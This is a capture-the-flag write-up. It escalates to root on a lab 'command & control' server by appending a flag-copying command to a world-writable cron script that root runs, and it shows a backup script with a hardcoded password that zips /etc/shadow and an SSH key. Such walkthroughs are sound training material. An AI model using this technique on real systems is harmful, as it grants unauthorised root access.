C&C Elevation (silver, 100p)

Great, now you have access to hackers command & control server.
But you probably need higher level access to find more valuable information.
Escalate privileges to root on command & control server at 10.XX.32.130
and read the flag from /root/flag.txt


Looking at the README, retrieved in C&C Access, reveals information about custom scheduled tasks via crontab.

# This share contains regular backups of our C&C server. #

Manual backups can be done by copying stuff to /share folder

For automated backups, specify a folder to back up in cronjob script.
/etc/crontab   - Cron jobs
/etc/backup.sh - Backup script running every minute.

DONE - B̶a̶c̶k̶u̶p̶ ̶p̶a̶s̶s̶w̶d̶ ̶a̶n̶d̶ ̶s̶h̶a̶d̶o̶w̶ ̶f̶i̶l̶e̶
DONE - P̶r̶o̶t̶e̶c̶t̶ ̶t̶h̶e̶ ̶c̶r̶e̶d̶z̶ ̶z̶i̶p̶ ̶f̶i̶l̶e̶ ̶w̶i̶t̶h̶ ̶p̶a̶s̶s̶w̶o̶r̶d̶
Set password to backup share!

Indeed, there is a scheduled task /etc/backup.sh, defined in /etc/crontab, which is run by root user every minute.

max@command_control_SRV1:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.


# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *     * * *   root    /etc/backup.sh >/dev/null 2>&1

File /etc/backup.sh contains a script to create credz_backup.zip seen previously.

max@command_control_SRV1:~$ cat /etc/backup.sh

# Back up the credentials for the system. Just in case max, change the passwords after initial testing
zip -e --password computer /share/credz_backup.zip -u /etc/passwd /etc/shadow /home/max/id_rsa

File /etc/backup.sh is world-writable, meaning it can be modified by anybody.

max@command_control_SRV1:~$ ls -al /etc/backup.sh
-rwxrw-rw- 1 root root 211 Oct 24 11:42 /etc/backup.sh

Append commands to /etc/backup.sh to make a copy of the flag.

max@command_control_SRV1:~$ echo >> /etc/backup.sh
max@command_control_SRV1:~$ echo "cat /root/flag.txt > /tmp/flag; chmod 777 /tmp/flag" >> /etc/backup.sh

Wait a minute for crontab to execute /etc/backup.sh and read the flag from /tmp/flag.